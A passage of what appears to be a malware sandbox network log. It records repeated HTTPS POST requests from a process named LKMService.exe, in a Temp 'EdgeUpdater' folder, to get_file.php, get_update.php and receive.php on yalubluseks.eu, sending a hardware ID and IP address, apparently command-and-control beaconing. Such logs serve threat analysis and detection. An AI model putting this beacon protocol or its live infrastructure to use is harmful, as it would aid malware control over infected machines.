                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                14192.168.2.652935104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:26 UTC144OUTPOST /get_file.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:28:27 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:27 UTC84OUTData Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
                2024-10-03 01:28:27 UTC600INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:27 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B2YemYAMAFrzllAKEHMkB5PnYQXnobvn2WSsZsORRiAVwY8ivGPZcRtHAw4zQaHB8CDoXQL1PO30kDpVNNFrLTEJ%2F%2BPZS7YVDUY5WH0O1I4vJicuxE2n6sAia4AOYDWpbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc927d0b9bc430e-EWR
                2024-10-03 01:28:27 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                15192.168.2.652936104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:27 UTC146OUTPOST /get_update.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 19
                Expect: 100-continue
                2024-10-03 01:28:27 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:27 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                Data Ascii: current_version=0.3
                2024-10-03 01:28:28 UTC611INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:28 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XdXxtzCFQRsY7fiN3ZgcOJM9%2BePaVFxKyFS53fZdyoZOnfxppVCnwblygLuW2516XUeRoweBFxBjjr28QXm5CwcKr3Ul%2BB%2BQw5Vv9BQS1wwdBi9s%2Fcv9IgsMpxFKCbi%2Ftw%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc927d6788d0c74-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                16192.168.2.652938104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:29 UTC143OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:28:29 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:29 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30
                Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
                2024-10-03 01:28:29 UTC607INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:29 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iTSTq0vezi1rFrrUt03CVNPCuKy0ZoQmvEhXCzo%2FRCqIBWXGgUrB1W%2BNGRrM8CVtxtpLMWMgJc5ke1C9tyXlEAoTQ3JYanFGzhO8Ve%2FCgaHyJkd4OKAuQAstUHiSDXneug%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc927e0baee5e6b-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                17192.168.2.652940104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:31 UTC144OUTPOST /get_file.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:28:31 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:31 UTC84OUTData Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
                2024-10-03 01:28:31 UTC601INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:31 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gkmQI8RQ369IBjm6NibcWVYa4SQDNY7ltFS3GcuVuH41ZFInAJx4kO8BuuSDkqt0ZH8dbaXMHjNuw04t0eKp4SNDXduMWrckM66H8dJCNfCtuQydmBcGeXsqvxmKtWHvGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc927eaabae4235-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                18192.168.2.652941104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:31 UTC146OUTPOST /get_update.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 19
                Expect: 100-continue
                2024-10-03 01:28:32 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:32 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                Data Ascii: current_version=0.3
                2024-10-03 01:28:32 UTC609INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:32 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SR7ccjZigvScW5IRX%2BVbvpOU%2B6qhGIF0VDDFBrIZvkOrSZB5zto4u07KL9L5ZqWhaCyfYlribARn7B%2Bq0h8rSUvT3%2BxYQkTGGAviUAwRkxXSup23uYatkpHJse0NxsKtKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc927f07d398c9c-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                19192.168.2.652943104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:35 UTC143OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:28:35 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:35 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30
                Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
                2024-10-03 01:28:36 UTC609INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:35 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hqCdoRWl1ydEzdHhqoISBvs0ds%2FcEBa7yt%2BjsSHszKkG2U0S0%2Bm3Ul3cSUvB6P0%2FPmonlXyYB5FyRAj3gWjdSXkd1nPzDKqmMS8ijviaxAAanqNmV27ezVz7TbbKqox1mA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc92804aa050cb2-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                20192.168.2.652945104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:37 UTC144OUTPOST /get_file.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:28:38 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:38 UTC84OUTData Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
                2024-10-03 01:28:38 UTC607INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:38 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mGOOf53uTnkQ4liY1K9OKE64rPYQCP87YMH%2FldNVaUUvGSu2TwTWzyJAurSlXWAACzAWQMMjbu%2BwUQ9PNgPL8g5lBqfbGuNduDYttBACZdH1ZjjVgrMngEz9DcuxSdK8%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc92814cca442a3-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                21192.168.2.652946104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:38 UTC146OUTPOST /get_update.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 19
                Expect: 100-continue
                2024-10-03 01:28:39 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:39 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                Data Ascii: current_version=0.3
                2024-10-03 01:28:39 UTC611INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:39 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Z044RL6w4ELmtPGW0RXKnGqn%2BhCsSc3FvEKp0ZwbchZUyJ08NqBdgCf8AKDsb%2F2FzHpTkD2Xz7f0AI%2Bp87paSsG2CqasAa24RDrxR%2FEMi9WiWb9KPsMgwxUszDyNbf%2FGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc9281b99b38c54-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                22192.168.2.652949104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:42 UTC143OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:28:43 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:43 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30
                Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
                2024-10-03 01:28:43 UTC601INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:43 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lxUtwJGTLXmSJFNYwuQs8Ng5Q4awSUXckCgw2ED2ZK3LTmQ3pagdEdgoNZGWHpDkQebn4zAxbLh4TbAr6biAFduFOycRuTz09y5sNvVsCxb5DhqFatGpNi2hzRmqiv0PYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc928351830de9a-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                23192.168.2.652951104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:44 UTC144OUTPOST /get_file.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:28:44 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:44 UTC84OUTData Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
                2024-10-03 01:28:44 UTC613INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:44 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aG9uKOTR%2Fj9s%2F0aG7JcRBwgUW%2FuUdkITtH4CPe8jJaYf93veY0rmvKvuYtZa88qQM7JpijvOAJ%2BxplNVJkgyI88GkZ331HT7zFOuSe6xELsz1Te%2B%2Fh81DBzo2swo6cJrpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc9283dbda01839-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                24192.168.2.652952104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:45 UTC146OUTPOST /get_update.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 19
                Expect: 100-continue
                2024-10-03 01:28:45 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:45 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                Data Ascii: current_version=0.3


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                25192.168.2.652954104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:48 UTC143OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:28:48 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:48 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30
                Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
                2024-10-03 01:28:49 UTC605INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:49 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20N00DnbL9ZCvO9Am6zQyXBOYgB%2FDZWaxyyzK4LqNBvPVcF77TvyDyoht1c0F5KpuxggiG6PzyqgG9wwAWxRpsbz6OUwcaIGGICG2RcT92torQLgV9wbkePnKlKPV4tF%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc928598bd68c09-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                26192.168.2.652956104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:50 UTC144OUTPOST /get_file.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:28:50 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:50 UTC84OUTData Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
                2024-10-03 01:28:50 UTC602INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:50 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HH9bQyC0GmoGkMSD0PgiYS9hGr3Iz%2BQAk7E84NopPNG64IDRCdUdEaSQgZWMaEGHF%2FcC2d2ee1FiAgEZevJ0aBViG9rmlZpOBXLdggc4tyCv%2BwjZr9sgLXYtSfdmFU2Lhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc928623a0e8cad-EWR
                2024-10-03 01:28:50 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                27192.168.2.652957104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:28:51 UTC146OUTPOST /get_update.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 19
                Expect: 100-continue
                2024-10-03 01:28:51 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:28:51 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                Data Ascii: current_version=0.3
                2024-10-03 01:28:51 UTC613INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:51 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8KyDRjQBOJLD%2B7iOxbsAkXWZonog%2BQyeQb9%2BSzkMUwXVBAiU2jfuH8SeQmij8cRXQ%2BvYCWOTpfkk%2BsB3N0Ro20VqVlRXW%2FZYmIZkbveKHRmkDOkmGH10RSNsD8g8peCSBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc92867f995c347-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                28192.168.2.652959104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:29:22 UTC143OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:29:22 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:29:22 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30
                Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
                2024-10-03 01:29:23 UTC609INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:29:22 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F8zEeI2DulwdTnWbkck2TFHJNTINYfcp0pkdv4ctUjGgBIjjtoF35dgjOm%2B9kNl817QTt1y0PctsCoQQ%2Bdo5NiN98N7dqdCxjEMPsyG%2Fhurgc0wUhGgSbs4iIAIkCztSVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc9292c7a397283-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                29192.168.2.652961104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:29:23 UTC144OUTPOST /get_file.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:29:24 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:29:24 UTC84OUTData Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
                2024-10-03 01:29:24 UTC605INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:29:24 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UpdIduEepSfuqrnLjUkf7xxc7aWw0aA52%2BlG6GypNoaQjDSHS6eMAClgNqgLfupSprUjXR6FYr%2FZdPBlIYv7JnfJVHWw8wC2cUfJB6RzvrBqYAjqGFEhbQhBuqTBbFCuzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc929358dad4303-EWR
                0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                30192.168.2.652962104.21.54.163443800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                2024-10-03 01:29:24 UTC146OUTPOST /get_update.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 19
                Expect: 100-continue
                2024-10-03 01:29:25 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:29:25 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                Data Ascii: current_version=0.3
                2024-10-03 01:29:25 UTC613INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:29:25 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JjdmVbCT37tNYaSu1I%2BK%2BQBR%2Fes%2FmXc7cHsP5B0k6uafHuPhuVOp10FrTVCgmHiJVI2ekVo%2FvyCEvhO7v0Dyr%2Ffs4tKBYTEZMr040CHnQmsYt7fOB8gLHATLl5rfpGiIRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc9293b398843ab-EWR
                0


                Session IDSource IPSource PortDestination IPDestination Port
                31192.168.2.652965104.21.54.163443
                TimestampBytes transferredDirectionData
                2024-10-03 01:29:56 UTC143OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:29:56 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:29:56 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30
                Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
                2024-10-03 01:29:56 UTC605INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:29:56 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                cf-cache-status: DYNAMIC
